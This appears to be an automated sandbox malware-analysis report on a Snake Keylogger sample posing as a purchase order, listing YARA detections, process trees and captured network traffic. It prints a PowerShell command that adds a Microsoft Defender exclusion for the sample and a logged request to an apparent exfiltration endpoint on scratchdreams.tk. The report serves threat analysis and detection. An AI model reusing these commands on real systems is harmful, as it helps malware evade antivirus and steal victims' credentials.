              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8QuHdvy36hIFzaQcNyJ65nVcaMz%2FlDVqvsNJoZ6yKYU8pClQ0y8iAyVXwsTZc42bIj%2B2pV9re2n8oV7v%2BP%2FRmZJYBhr8w%2BvHP35ZpOCKTv%2FjjgKPw67P2rew741SwIaYFsp8F93"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d53ff6e0cdd-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:13 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:13 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.649720188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:15 UTC85OUTGET /xml/8.46.123.175 HTTP/1.1
              Host: reallyfreegeoip.org
              Connection: Keep-Alive
              2024-05-23 13:13:15 UTC710INHTTP/1.1 200 OK
              Date: Thu, 23 May 2024 13:13:15 GMT
              Content-Type: application/xml
              Transfer-Encoding: chunked
              Connection: close
              access-control-allow-origin: *
              vary: Accept-Encoding
              Cache-Control: max-age=86400
              CF-Cache-Status: HIT
              Age: 15056
              Last-Modified: Thu, 23 May 2024 09:02:19 GMT
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wb9ml%2BLaMzNc6XPOvv%2FslWRLcKd3PGwsQ3VLe2%2B44i5P4%2BjDFD1vhocsJrWvlA6ZizjEpJTpf%2B1gayILVa1GLpUgVDskUB9u9trZe7vBG7NZM2nUo6bRnX2JvDb3hvD21ekUSH6M"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 88854d6059a943a7-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:15 UTC341INData Raw: 31 34 65 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37
              Data Ascii: 14e<Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.7
              2024-05-23 13:13:15 UTC5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.649722188.114.97.34436976C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              TimestampBytes transferredDirectionData
              2024-05-23 13:13:16 UTC79OUTGET /_send_.php?TS HTTP/1.1
              Host: scratchdreams.tk
              Connection: Keep-Alive
              2024-05-23 13:13:55 UTC743INHTTP/1.1 522
              Date: Thu, 23 May 2024 13:13:55 GMT
              Content-Type: text/plain; charset=UTF-8
              Content-Length: 15
              Connection: close
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JHzL7kwg6N0Ow%2BB8Bn6I8%2BaneoAADiYq1iwmZo9QICMuU%2BHu4TsWbowIRRgnDFIihLpa7%2BxBNFaSW%2F4nzBCPJeDm3PTSyskBicT%2B%2BKNFa243f2lYdMY2qalgb8dzO6gANAo"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              X-Frame-Options: SAMEORIGIN
              Referrer-Policy: same-origin
              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
              Expires: Thu, 01 Jan 1970 00:00:01 GMT
              Server: cloudflare
              CF-RAY: 88854d66cb5f43bc-EWR
              alt-svc: h3=":443"; ma=86400
              2024-05-23 13:13:55 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
              Data Ascii: error code: 522


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:09:12:55
              Start date:23/05/2024
              Path:C:\Users\user\Desktop\ORDEM DE COMPRA.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\ORDEM DE COMPRA.exe"
              Imagebase:0x1fbd7aa0000
              File size:528'393 bytes
              MD5 hash:46DAB257847EA9CFBBC77979323212C4
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              General

              Target ID:2
              Start time:09:12:59
              Start date:23/05/2024
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
              Imagebase:0x7ff6e3d50000
              File size:452'608 bytes
              MD5 hash:04029E121A0CFA5991749937DD22A1D9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:09:12:59
              Start date:23/05/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff66e660000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Wow64 process (32bit):
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
              Imagebase:
              File size:45'984 bytes
              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:5
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Imagebase:0xd30000
              File size:43'008 bytes
              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:moderate
              Has exited:false

              General

              Target ID:6
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              Wow64 process (32bit):
              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Imagebase:
              File size:43'008 bytes
              MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              General

              Target ID:9
              Start time:09:13:00
              Start date:23/05/2024
              Path:C:\Windows\System32\WerFault.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\WerFault.exe -u -p 1756 -s 1120
              Imagebase:0x7ff794210000
              File size:570'736 bytes
              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Executed Functions

                Function 00007FFD348A0868 Relevance: 84.2, Strings: 66, Instructions: 1668COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$7q$7q$8q$8q$9q$9q$cy4
                • API String ID: 0-2972097800
                • Opcode ID: abc8cdcd24fa63d5621a3c060c0a7ab2b9e7a49c0e9453e70e9924118ed122e3
                • Instruction ID: b0a30c2fdf0dc98500b1c9f7ad2367697cb98f9c54ea202d38dc601e010da704
                • Opcode Fuzzy Hash: abc8cdcd24fa63d5621a3c060c0a7ab2b9e7a49c0e9453e70e9924118ed122e3
                • Instruction Fuzzy Hash: 23C2E230A1E7855FE35A9BB848A3699BBE0EF52360F1540BED44ECB1D3D99C080B8B55
                Function 00007FFD348A0AE0 Relevance: 82.7, Strings: 65, Instructions: 1464COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$6q$7q$7q$8q$8q$9q$9q
                • API String ID: 0-1071263328
                • Opcode ID: e6bb3627dccab1f4d94646fd4ca13ddadb3825472acc821464c176a55e8056fc
                • Instruction ID: a9cd7183a82753999b4022549538396701e692be8c5367bc292579a598345b97
                • Opcode Fuzzy Hash: e6bb3627dccab1f4d94646fd4ca13ddadb3825472acc821464c176a55e8056fc
                • Instruction Fuzzy Hash: BAB2E23062E3855FE35E8BB844A36D9BBE0EF52364F1540BED44ECB193D99D080BCA59
                Function 00007FFD348A0BD3 Relevance: 81.4, Strings: 64, Instructions: 1372COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7q$ 8q$ 9q$ :q$ [q$(7q$(8q$(9q$(:q$([q$07q$08q$09q$0:q$0[q$1N_I$87q$88q$89q$8:q$8[q$@7q$@8q$@9q$@:q$@[q$H7q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$7q$7q$8q$8q$9q$9q
                • API String ID: 0-3688058974
                • Opcode ID: d68cc374e9b3e48f1b00701c7f60c3bfa82fb884a9c4fc38bfecd99bb16ff864
                • Instruction ID: 2a63305f46a72b0099064311f7b47066542219c56fd22ce85b7ba24b66dc5182
                • Opcode Fuzzy Hash: d68cc374e9b3e48f1b00701c7f60c3bfa82fb884a9c4fc38bfecd99bb16ff864
                • Instruction Fuzzy Hash: 62A2E23062D3855FE31E9BB844A36D9BBE0EF52364F1540BED44ECB193D99D080BCA59
                Function 00007FFD348A0ADB Relevance: 73.8, Strings: 58, Instructions: 1263COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 8q$ 9q$ :q$ [q$(8q$(9q$(:q$([q$08q$09q$0:q$0[q$1N_I$88q$89q$8:q$8[q$@8q$@9q$@:q$@[q$H8q$H9q$H:q$P7q$P8q$P9q$P:q$X7q$X8q$X9q$X:q$`7q$`8q$`9q$`:q$h7q$h8q$h9q$h:q$p7q$p8q$p9q$p:q$x6q$x6q$x6q$x6q$x6q$x7q$x8q$x9q$7q$7q$8q$8q$9q$9q
                • API String ID: 0-1989226791
                • Opcode ID: e8ef289956016679f3fafcb8d0e8415a92c4867e229844298f6189d2821275f4
                • Instruction ID: 5506b0390624c4d3748a50910a02b44ab5da08eef6617aaa05707b0516d47231
                • Opcode Fuzzy Hash: e8ef289956016679f3fafcb8d0e8415a92c4867e229844298f6189d2821275f4
                • Instruction Fuzzy Hash: FA92D23062D3855FE35E8BB844A32D9BBE4EF52364F1540BED44ECB193C99D084BCA5A
                Function 00007FFD348A05D3 Relevance: 14.0, Strings: 11, Instructions: 285COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 7K>$@`y4$N_^I$N_^T$N_^U$N_^\$N_^]$x[q$x[q$x[q${>N
                • API String ID: 0-4056846863
                • Opcode ID: 6c4c9e022157e72e9c6b9ed48bd14af2843f5491a36c762caf8cc3e85f563dba
                • Instruction ID: ad9895a086495541f2414830205b8b7dc9707e2fcc98390c97bc62c9c17485ae
                • Opcode Fuzzy Hash: 6c4c9e022157e72e9c6b9ed48bd14af2843f5491a36c762caf8cc3e85f563dba
                • Instruction Fuzzy Hash: 6B711113B0D4661BE7257AFCB8B51FE6794DF82375708517BD28DCB083EC68648682E1
                Function 00007FFD349C0261 Relevance: 7.2, Strings: 4, Instructions: 2215COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2188199805.00007FFD349C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD349C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd349c0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: 8z4$A$hz4$pz4
                • API String ID: 0-934019805
                • Opcode ID: 8498868fe2175197cb524eb17cd69e9e865e331aebbb2c3de818328e1a0c4e1f
                • Instruction ID: c962ed36ecb6f4dd07b1e31ad00102fc9efc5c4759354cabc17e349f93f266c5
                • Opcode Fuzzy Hash: 8498868fe2175197cb524eb17cd69e9e865e331aebbb2c3de818328e1a0c4e1f
                • Instruction Fuzzy Hash: CDE2243290EBC64FEB56DB2888A55A47BE0EF57300F0905FEC189CB197DA2D6C46C761
                Function 00007FFD348A1F65 Relevance: 4.1, Strings: 3, Instructions: 367COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: H[q$P[q$x6q
                • API String ID: 0-3240696724
                • Opcode ID: 11fc5b52d6753dc4fbcfe428e6b9cdeed789989c72a20c39f3180125c3f63bbb
                • Instruction ID: e94e7ad3812335f51adfbcc9f8023796b98b06cc498a88006f151797a9a861f3
                • Opcode Fuzzy Hash: 11fc5b52d6753dc4fbcfe428e6b9cdeed789989c72a20c39f3180125c3f63bbb
                • Instruction Fuzzy Hash: E2B10321B1AA4A0FE7D5ABBC48AA3B976C2EF8A310F4401B9D10DC72D3DD6C6C459791
                Function 00007FFD348A5D25 Relevance: 3.3, Instructions: 3321COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 32e8022cb3018d6b9618bf34a987ef3dbea3c18086de043b8cdc274745b17c1a
                • Instruction ID: c71fe518ab5162f87c8af379045235d1bdd716e34b59dacd77bd2dc5c6f72205
                • Opcode Fuzzy Hash: 32e8022cb3018d6b9618bf34a987ef3dbea3c18086de043b8cdc274745b17c1a
                • Instruction Fuzzy Hash: 5943407061CB468FD7B8DB18C4A5AAAB7E1FF99300F10457ED58DC7291DE38A841DB82
                Function 00007FFD348D1658 Relevance: 2.3, Instructions: 2320COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0cca5810dd11cec7fd2c07ee4d6e95de8e640110e5ada8b0f24ec0cde7e4abd2
                • Instruction ID: 084d699cf284096d0f508a31d8a1f8c85e240961856816709202c322c84aa299
                • Opcode Fuzzy Hash: 0cca5810dd11cec7fd2c07ee4d6e95de8e640110e5ada8b0f24ec0cde7e4abd2
                • Instruction Fuzzy Hash: B2E2F531B0DA4A4FDB58EB58D4A16B5B3E1FF96310F1442BED44EC3596DE28F8428781
                Function 00007FFD348A5CA8 Relevance: 2.0, Strings: 1, Instructions: 750COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: x6q
                • API String ID: 0-3747761675
                • Opcode ID: 55faad9cd6beb4e4abf87a0768fa3fef11c3efe1fbb858ea45048eb599f5fe16
                • Instruction ID: d4130f418e6702b479d95cd0b249e2a28afa918e43c218f3c946534fb3a992da
                • Opcode Fuzzy Hash: 55faad9cd6beb4e4abf87a0768fa3fef11c3efe1fbb858ea45048eb599f5fe16
                • Instruction Fuzzy Hash: 1022E931B1CA454BE798AB2894A6679B3D2FF89710F44457FE54EC32C2DE2CFC429681
                Function 00007FFD348A9F2F Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: Mx4
                • API String ID: 0-1063676410
                • Opcode ID: f0788fa18618b88a9d4232707a52a17e52d816e1b97d2033faa62f7029dfad62
                • Instruction ID: 77bc3ce550a166ead0f6ddf1f1cbf97cd7b0d2cebf1d78d4c43fab0bdce47dac
                • Opcode Fuzzy Hash: f0788fa18618b88a9d4232707a52a17e52d816e1b97d2033faa62f7029dfad62
                • Instruction Fuzzy Hash: A4711252A0EAC54FE7969B7C58751B97BE1EF4321470802FFC489C70E7DD9CA80A9352
                Function 00007FFD348A06D3 Relevance: 11.4, Strings: 9, Instructions: 189COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: @`y4$N_^R$N_^T$N_^U$N_^\$N_^]$x[q$x[q$x[q
                • API String ID: 0-3373746688
                • Opcode ID: d967625c4738eca78749bec0ac6484bf0ecf7bc1585e8662bc41c1c18e14ba22
                • Instruction ID: 3c2b9d49e8198e1a62b9c5efffc94e43f487e41e3956f6b7f0af7c7d3d2b3cbf
                • Opcode Fuzzy Hash: d967625c4738eca78749bec0ac6484bf0ecf7bc1585e8662bc41c1c18e14ba22
                • Instruction Fuzzy Hash: 01415A53B1E5161BE7A576FC68BA5FE2B98CF4277070801B7D20DC71C3ED6C244682A1
                Function 00007FFD348A0818 Relevance: 7.8, Strings: 6, Instructions: 313COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: [q$([q$)N_I$0[q$@[q$Gy4
                • API String ID: 0-3840250558
                • Opcode ID: 2a15d9c04e500b741874104e7d44e9c145a78b7d16b10e7cdd7ae75185824654
                • Instruction ID: 931df2774c1d392ddcc67073a72692308f0157b1bd14c5bc5e93b2b6f7915d07
                • Opcode Fuzzy Hash: 2a15d9c04e500b741874104e7d44e9c145a78b7d16b10e7cdd7ae75185824654
                • Instruction Fuzzy Hash: 3AA1F962F0E6825BE76567FC68B61E57BE4EF5232470C01BBD188CB1D3EC6CA8458391
                Function 00007FFD348A4769 Relevance: 6.4, Strings: 5, Instructions: 171COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: @`y4$H$p[q$p[q$p[q
                • API String ID: 0-2733547152
                • Opcode ID: af8f58a0b08fe139dbc02647e09cf2e7025d4673c89326910480a1420a78d6fc
                • Instruction ID: d61f30238b0da44c0efe849e504aa2bd5ded0cc410f430e6c814d3207db550a6
                • Opcode Fuzzy Hash: af8f58a0b08fe139dbc02647e09cf2e7025d4673c89326910480a1420a78d6fc
                • Instruction Fuzzy Hash: 2751363271EA854FDB9C9B7C94AA67577C0EF56710B0401BFD04AC72E2EEACA842C741
                Function 00007FFD348A4991 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: ~q$~q$~q$~q$~q
                • API String ID: 0-611987798
                • Opcode ID: 4829f18aaeb28f4a3bb5610335a508717ecb862511ad0d4318f5e299e9dd6883
                • Instruction ID: 522334234b4388f7ca90b9e2f89428c4649b7448ec6ce266679e24dd5b49bc28
                • Opcode Fuzzy Hash: 4829f18aaeb28f4a3bb5610335a508717ecb862511ad0d4318f5e299e9dd6883
                • Instruction Fuzzy Hash: 2B31C466A0E7C64FEB93E77848761A47BE0EF07610B0914FAD08DC71E3D96C2C499352
                Function 00007FFD348A07A5 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2187191270.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ffd348a0000_ORDEM DE COMPRA.jbxd
                Similarity
                • API ID:
                • String ID: @`y4$x[q$x[q$x[q
                • API String ID: 0-1402900765
                • Opcode ID: a92a35b18364b2fefca1a13b68ab4cbaa3b8a70578cdc33e9c2baf5cbd55b87b
                • Instruction ID: 585f6a1c733c4c8b6d71f88e8be14045d922b06b4c9375ba39fa34daabf153a1
                • Opcode Fuzzy Hash: a92a35b18364b2fefca1a13b68ab4cbaa3b8a70578cdc33e9c2baf5cbd55b87b
                • Instruction Fuzzy Hash: 3D213512B1F54A1FF7A966BC28BA5FA27C4DF92770B08417BE10DC71D3EDAC68025260
                Function 00007FFD348A46A9 Relevance: 5.1, Strings: 4, Instructions: 93COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
